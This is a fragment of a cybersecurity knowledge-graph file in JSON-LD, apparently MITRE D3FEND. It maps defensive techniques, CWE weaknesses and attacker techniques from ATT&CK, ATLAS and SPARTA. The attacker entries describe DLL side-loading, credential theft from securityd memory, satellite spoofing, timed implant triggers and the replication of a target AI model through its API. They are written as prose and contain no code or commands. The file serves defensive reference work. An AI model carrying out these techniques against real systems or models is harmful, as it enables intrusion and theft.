      "d3f:kb-reference-of": {
        "@id": "d3f:EmailFiltering"
      },
      "d3f:kb-reference-title": "System and method for providing anonymous remailing and filtering of electronic mail",
      "rdfs:label": "Reference - System and method for providing anonymous remailing and filtering of electronic mail - Nokia"
    },
    {
      "@id": "d3f:T1574.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.002",
      "d3f:definition": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).",
      "d3f:may-create": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:SharedLibraryFile"
      },
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.001",
      "rdfs:label": "DLL Side-Loading",
      "rdfs:seeAlso": "T1574.001",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:Ne847526482284089982fe1632a4aca85"
        },
        {
          "@id": "_:N3251719cfd7e4acfaa4477066840aa14"
        }
      ]
    },
    {
      "@id": "_:Ne847526482284089982fe1632a4aca85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N3251719cfd7e4acfaa4477066840aa14",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:CWE-215",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-215",
      "d3f:definition": "The product inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production.",
      "rdfs:label": "Insertion of Sensitive Information Into Debugging Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:Semi-supervisedCo-training",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSCT",
      "d3f:definition": "Multi-view co-training involves training the classifiers in completely different views of training data. On the other hand, single-view co-training methods are generally applied as ensemble methods.",
      "d3f:kb-article": "## References\nJashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)",
      "rdfs:label": "Semi-supervised Co-training",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-supervisedWrapperMethod"
      }
    },
    {
      "@id": "d3f:MicrosoftWordDOCFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOC File"
    },
    {
      "@id": "d3f:T1218",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218",
      "d3f:definition": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.",
      "rdfs:label": "System Binary Proxy Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CWE-27",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-27",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize multiple internal \"../\" sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: 'dir/../../filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:ElectronicCombinationLock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system comprised of an automatic door closer on the door, an input device, a controlling device, and a lock, usually mechanical, which is released or activated when the correct combination is entered or correct token is presented.",
      "d3f:uses": {
        "@id": "d3f:Password"
      },
      "rdfs:isDefinedBy": "NRC Regulatory Guide 5.12 Rev1",
      "rdfs:label": "Electronic Combination Lock",
      "rdfs:seeAlso": {
        "@id": "dbr:Electronic_lock"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CombinationLock"
        },
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:Ne61eee496cca4d3f985f7bd864dd26f9"
        }
      ]
    },
    {
      "@id": "_:Ne61eee496cca4d3f985f7bd864dd26f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACESETREGS",
      "@type": "owl:Class",
      "d3f:definition": "Modify the tracee's general-purpose or floating-point registers, respectively, from the address data in the tracer.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_SETREGS",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISetRegisters"
      }
    },
    {
      "@id": "d3f:EX-0018.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0018.02",
      "d3f:definition": "A high-powered laser can be used to permanently or temporarily damage critical satellite components (i.e. solar arrays or optical centers). If directed toward a satellite’s optical center, the attack is known as blinding or dazzling. Blinding, as the name suggests, causes permanent damage to the optics of a satellite. Dazzling causes temporary loss of sight for the satellite. While there is clear attribution of the location of the laser at the time of the attack, the lasers used in these attacks may be mobile, which can make attribution to a specific actor more difficult because the attacker does not have to be in their own nation, or even continent, to conduct such an attack. Only the satellite operator will know if the attack is successful, meaning the attacker has limited confirmation of success, as an attacked nation may not choose to announce that their satellite has been attacked or left vulnerable for strategic reasons. A high-powered laser attack can also leave the targeted satellite disabled and uncontrollable, which could lead to collateral damage if the satellite begins to drift. A higher-powered laser may permanently damage a satellite by overheating its parts. The parts most susceptible to this are satellite structures, thermal control panels, and solar panels.*\n\n*https://aerospace.csis.org/aerospace101/counterspace-weapons-101",
      "rdfs:label": "High-Powered Laser - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0018/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0018"
      },
      "skos:prefLabel": "High-Powered Laser"
    },
    {
      "@id": "d3f:T1037.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1037.002",
      "d3f:definition": "Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)",
      "d3f:modifies": {
        "@id": "d3f:UserInitScript"
      },
      "rdfs:label": "Login Hook",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1037"
        },
        {
          "@id": "_:Ncef97a5e3a634c3e9ba42fbf9a587189"
        }
      ]
    },
    {
      "@id": "_:Ncef97a5e3a634c3e9ba42fbf9a587189",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitScript"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForNetworkSecurityIncludingDetectionOfAttacksThroughPartnerWebsites_EMCIPHoldingCoLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20110302653A1/en?oq=US+20110302653+A1"
      },
      "d3f:kb-abstract": "A computer readable storage medium has instructions for execution on a computer. The instructions monitor transactions between a server and a set of clients. An evaluation of session indicators associated with the transactions is performed. Individual sessions between the server and individual clients of the plurality of clients are isolated in response to the evaluation.",
      "d3f:kb-author": "Matt Frantz; Andreas Wittenstein; Mike Eynon; Laura Mather; Jim Lloyd; James Schumacher; Duane Murphy",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting man-in-the-browser attacks. Current user session data is compared with the average user session that is based on collected data representing average values across all user sessions over a data-collection period. User session data includes average time between clicks and the order in which website pages are viewed. The comparisons are combined to generate a score that indicates the likelihood that the current session is a man-in-the-browser attack.",
      "d3f:kb-organization": "EMC IP Holding Co LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:WebSessionActivityAnalysis"
      },
      "d3f:kb-reference-title": "System and Method for Network Security Including Detection of Attacks Through Partner Websites",
      "rdfs:label": "Reference - System and Method for Network Security Including Detection of Attacks Through Partner Websites - EMC IP Holding Co LLC"
    },
    {
      "@id": "d3f:pref-label",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x pref-label y: The preferred display value for x is y in d3fend tools.",
      "rdfs:label": "pref-label",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:ContentValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentValidation"
      ],
      "d3f:d3fend-id": "D3-CV",
      "d3f:definition": "Verify and validate that content complies with policy.",
      "d3f:kb-article": "## How it works\n\nTo ensure that content is safe, its composition must be validated according to its content policy.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-FileSecurityUsingFileFormatValidation_OPSWATInc"
      },
      "rdfs:label": "Content Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:ContentFiltering"
      }
    },
    {
      "@id": "d3f:M1016",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "Future D3FEND releases will model the scanning and inventory domains.",
      "rdfs:label": "Vulnerability Scanning"
    },
    {
      "@id": "d3f:PhysicalLinkUpEvent",
      "@type": "owl:Class",
      "d3f:definition": "Auto-negotiation and signal detection complete; carrier is present and the link can forward frames.",
      "rdfs:label": "Physical Link Up Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:N8e6c029b18044bc8a877d713fe35e06d"
        },
        {
          "@id": "_:N35f546fa8aea4747b893c1791cddf9f0"
        }
      ]
    },
    {
      "@id": "_:N8e6c029b18044bc8a877d713fe35e06d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkConnectEvent"
      }
    },
    {
      "@id": "_:N35f546fa8aea4747b893c1791cddf9f0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkDownEvent"
      }
    },
    {
      "@id": "d3f:T1611",
      "@type": "owl:Class",
      "d3f:attack-id": "T1611",
      "d3f:definition": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)",
      "rdfs:label": "Escape to Host",
      "rdfs:subClassOf": {
        "@id": "d3f:PrivilegeEscalationTechnique"
      }
    },
    {
      "@id": "d3f:CWE-413",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-413",
      "d3f:definition": "The product does not lock or does not correctly lock a resource when the product must have exclusive access to the resource.",
      "rdfs:label": "Improper Resource Locking",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:UnixHardLink",
      "@type": "owl:Class",
      "d3f:definition": "A Unix hard link is a hard link on a Unix file system.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Hard_link"
      },
      "rdfs:label": "Unix Hard Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardLink"
        },
        {
          "@id": "d3f:UnixLink"
        }
      ]
    },
    {
      "@id": "d3f:T1053.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1053.005",
      "d3f:definition": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)",
      "d3f:executes": {
        "@id": "d3f:ScheduledJob"
      },
      "rdfs:label": "Scheduled Task",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1053"
        },
        {
          "@id": "_:Nf1f46fd4ae444f4b9bed4eb96690e557"
        }
      ]
    },
    {
      "@id": "_:Nf1f46fd4ae444f4b9bed4eb96690e557",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "d3f:T1555.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:In-memoryPasswordStore"
      },
      "d3f:attack-id": "T1555.002",
      "d3f:definition": "An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)",
      "rdfs:label": "Securityd Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1555"
        },
        {
          "@id": "_:Nada5a8c3e91c44e4b33cdbd06adee20b"
        }
      ]
    },
    {
      "@id": "_:Nada5a8c3e91c44e4b33cdbd06adee20b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:In-memoryPasswordStore"
      }
    },
    {
      "@id": "d3f:T1424",
      "@type": "owl:Class",
      "d3f:attack-id": "T1424",
      "d3f:definition": "Adversaries may attempt to get information about running processes on a device. Information obtained could be used to gain an understanding of common software/applications running on devices within a network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1424) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "rdfs:label": "Process Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "Process Discovery"
    },
    {
      "@id": "d3f:T1560.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1560.003",
      "d3f:creates": {
        "@id": "d3f:CustomArchiveFile"
      },
      "d3f:definition": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)",
      "rdfs:label": "Archive via Custom Method",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1560"
        },
        {
          "@id": "_:N7ce2d56bcc3043d1a238a29026495c22"
        }
      ]
    },
    {
      "@id": "_:N7ce2d56bcc3043d1a238a29026495c22",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CustomArchiveFile"
      }
    },
    {
      "@id": "d3f:CWE-186",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-186",
      "d3f:definition": "A regular expression is overly restrictive, which prevents dangerous values from being detected.",
      "rdfs:label": "Overly Restrictive Regular Expression",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-185"
      }
    },
    {
      "@id": "d3f:Reference-HowTrustRelationshipsWorkForResourceForestsInAzureActiveDirectoryDomainServices",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/azure/active-directory-domain-services/concepts-forest-trust"
      },
      "d3f:kb-abstract": "Active Directory Domain Services (AD DS) provides security across multiple domains or forests through domain and forest trust relationships. Before authentication can occur across trusts, Windows must first check if the domain being requested by a user, computer, or service has a trust relationship with the domain of the requesting account.",
      "d3f:kb-author": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:kb-reference-title": "How trust relationships work for resource forests in Azure Active Directory Domain Services",
      "rdfs:label": "Reference - How trust relationships work for resource forests in Azure Active Directory Domain Services"
    },
    {
      "@id": "d3f:AML.T0005",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0005",
      "d3f:definition": "Adversaries may obtain models to serve as proxies for the target model in use at the victim organization.\nProxy models are used to simulate complete access to the target model in a fully offline manner.\n\nAdversaries may train models from representative datasets, attempt to replicate models from victim inference APIs, or use available pre-trained models.",
      "rdfs:label": "Create Proxy AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIAttackStagingTechnique"
      },
      "skos:prefLabel": "Create Proxy AI Model"
    },
    {
      "@id": "d3f:CWE-1113",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1113",
      "d3f:definition": "The source code uses comment styles or formats that are inconsistent or do not follow expected standards for the product.",
      "rdfs:label": "Inappropriate Comment Style",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:EX-0008.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0008.02",
      "d3f:definition": "Execution is keyed to elapsed time since a reference event. The implant latches a start point, boot, reset, safing entry/exit, receipt of a particular telemetry/command pattern, achievement of sun-pointing, and arms a countdown or set of offsets (“N seconds after event,” “repeat every M cycles”). Relative sequences are resilient to clock discontinuities and mirror how many spacecraft schedule internal activities (e.g., after boot, run calibrations; after acquisition, start downlink). An attacker exploits this to ensure the trigger fires only within specific operational phases and to survive resets that would thwart absolute timestamps: after every reboot, wait for housekeeping steady state, then act; or, after a wheel unload completes, inject an additional command while control laws are in a known configuration.",
      "rdfs:label": "Relative Time Sequences - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0008/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0008"
      },
      "skos:prefLabel": "Relative Time Sequences"
    },
    {
      "@id": "d3f:T1421",
      "@type": "owl:Class",
      "d3f:attack-id": "T1421",
      "d3f:definition": "Adversaries may attempt to get a listing of network connections to or from the compromised device they are currently accessing or from remote systems by querying for information over the network.",
      "rdfs:label": "System Network Connections Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "System Network Connections Discovery"
    },
    {
      "@id": "d3f:ResourceFork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The resource fork is a fork or section of a file on Apple's classic Mac OS operating system, which was also carried over to the modern macOS for compatibility, used to store structured data along with the unstructured data stored within the data fork.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Resource_fork"
      },
      "rdfs:label": "Resource Fork",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "d3f:T1591.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1591.003",
      "d3f:definition": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.",
      "rdfs:label": "Identify Business Tempo",
      "rdfs:subClassOf": {
        "@id": "d3f:T1591"
      }
    },
    {
      "@id": "d3f:EX-0014",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0014",
      "d3f:definition": "The adversary forges inputs that subsystems treat as trustworthy truth, time tags, sensor measurements, bus messages, or navigation signals, so onboard logic acts on fabricated reality. Because many control loops and autonomy rules assume data authenticity once it passes basic sanity checks, carefully shaped spoofs can trigger mode transitions, safing, actuator commands, or payload behaviors without touching flight code. Spoofing may occur over RF (e.g., GNSS, crosslinks, TT&C beacons), over internal networks/buses (message injection with valid identifiers), or at sensor/actuator interfaces (electrical/optical stimulation that produces plausible readings). Effects range from subtle bias (drifting estimates, skewed calibrations) to acute events (unexpected slews, power reconfiguration, recorder re-indexing), and can also pollute downlinked telemetry or science products so ground controllers interpret a false narrative. The hallmark is that the spacecraft chooses the adversary’s action path because the forged data passes through normal processing chains.",
      "rdfs:label": "Spoofing - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Spoofing"
    },
    {
      "@id": "d3f:OTTestCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a device to run a program in Test mode.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Test Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N5a211cbfd8aa460da2261e4575340e8b"
        }
      ]
    },
    {
      "@id": "_:N5a211cbfd8aa460da2261e4575340e8b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:windows-registry-data-property",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x windows-registry-data-property y: The windows registry entry x has the property y.",
      "rdfs:label": "windows-registry-data-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-artifact-data-property"
      }
    },
    {
      "@id": "d3f:T0815",
      "@type": "owl:Class",
      "d3f:attack-id": "T0815",
      "d3f:definition": "Adversaries may cause a denial of view in an attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Denial of View - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Denial of View"
    },
    {
      "@id": "d3f:RD-0005.01",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0005.01",
      "d3f:definition": "Rather than “owning a pad,” a realistic path is purchasing launch services (rideshare, hosted payload) to place inspection or relay assets where they confer RF, optical, or proximity advantage. Launch providers deliver integration, testing, and scheduling; an actor can use benign mission covers to field small satellites that measure local spectrum, perform on-orbit characterization of target emissions, or support later rendezvous and proximity operations. The resource being developed is access to vantage points, not just spaceflight hardware.",
      "rdfs:label": "Launch Services - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0005/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0005"
      },
      "skos:prefLabel": "Launch Services"
    },
    {
      "@id": "d3f:CWE-477",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-477",
      "d3f:definition": "The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained.",
      "rdfs:label": "Use of Obsolete Function",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-04-001%3AShadowCopyDeletion_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-04-001/"
      },
      "d3f:kb-abstract": "The Windows Volume Shadow Copy Service is a built-in OS feature that can be used to create backup copies of files and volumes.\n\nAdversaries may delete these shadow copies, typically through the usage of system utilities such as vssadmin.exe or wmic.exe, in order to prevent file and data recovery. This technique is commonly employed for this purpose by ransomware.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-04-001: Shadow Copy Deletion",
      "rdfs:label": "Reference - CAR-2020-04-001: Shadow Copy Deletion - MITRE"
    },
    {
      "@id": "d3f:Application-basedProcessIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Application-basedProcessIsolation"
      ],
      "d3f:d3fend-id": "D3-ABPI",
      "d3f:definition": "Application code which prevents its own subroutines from accessing intra-process / internal memory space.",
      "d3f:isolates": {
        "@id": "d3f:Process"
      },
      "d3f:kb-article": "## How it works\nSome applications implement logic to permit or deny a particular subroutine access to other data within the same application process. This is intended to prevent critical application process data from being tampered with.\n\n### Application-based Process Isolation in web browsers.\n\nIsolation in browsers usually is designed with the following architectural mindset:\n* Sandboxes and web resources should not be allowed to access each other because compromise of one should not affect the other.\n* The principle of least privilege should be followed when browsing.\n\nThe following aspects help make browser-based process isolation possible:\n* Same Origin Policy\n* Separate tabs and iframes use their own DOMs (cross-site document object models always run as a different process)\n* CORS ensures cross-site data is not delivered to a process unless the server allows it\n* Cookie and local data storage is separated by domain/site\n* Separate execution environments (threads)\n\n## Considerations\n- Isolation in browsers mitigates some types of attacks by default (e.g. renderer attacks and access to the filesystem), but this depends on correct configuration of CORS and use of valid/appropriate certificates.\n-  Application-based Process Isolation may increase memory footprint.\n-  Application-based Process Isolation may decrease application performance.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PrivateApplicationAccessWithBrowserIsolation"
        },
        {
          "@id": "d3f:Reference-ProtectingWebApplicationsFromUntrustedEndpointsUsingRemoteBrowserIsolation"
        },
        {
          "@id": "d3f:Reference-SiteIsolationDesignDocument"
        }
      ],
      "d3f:restricts": {
        "@id": "d3f:Subroutine"
      },
      "d3f:synonym": [
        "Browser-based Process Isolation",
        "Remote Browser Isolation",
        "Sandbox"
      ],
      "rdfs:label": "Application-based Process Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "_:N4322d28a54b747ceab8e77d7f28c277a"
        },
        {
          "@id": "_:N4dee107304db4a9daf28468fa2ced065"
        }
      ]
    },
    {
      "@id": "_:N4322d28a54b747ceab8e77d7f28c277a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:N4dee107304db4a9daf28468fa2ced065",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:T1648",
      "@type": "owl:Class",
      "d3f:attack-id": "T1648",
      "d3f:definition": "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers.",
      "rdfs:label": "Serverless Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:Reference-Securing_Web_Transactions__TLS_Server_Certificate_Management_Appendix_A_Passive_Inspection",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.nccoe.nist.gov/publication/1800-16/VolD/vol-d-appendix.html"
      },
      "d3f:kb-abstract": "The example implementation demonstrates the ability to perform passive inspection of encrypted TLS connections. The question of whether or not to perform such an inspection is complex. There are important tradeoffs between traffic security and traffic visibility that each organization should consider. Some organizations prefer to decrypt internal TLS traffic, so it can be inspected to detect attacks that may be hiding within encrypted connections. Such inspection can detect intrusion, malware, and fraud, and can conduct troubleshooting, forensics, and performance monitoring. For these organizations, TLS inspection may serve as both a standard practice and a critical component of their threat detection and service assurance strategies.",
      "d3f:kb-author": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:PassiveCertificateAnalysis"
      },
      "d3f:kb-reference-title": "Securing Web Transactions TLS Server Certificate Management - Appendix A Passive Inspection",
      "rdfs:label": "Reference - Securing Web Transactions TLS Server Certificate Management - Appendix A Passive Inspection"
    },
    {
      "@id": "d3f:M1055",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "rdfs:label": "Do Not Mitigate"
    },
    {
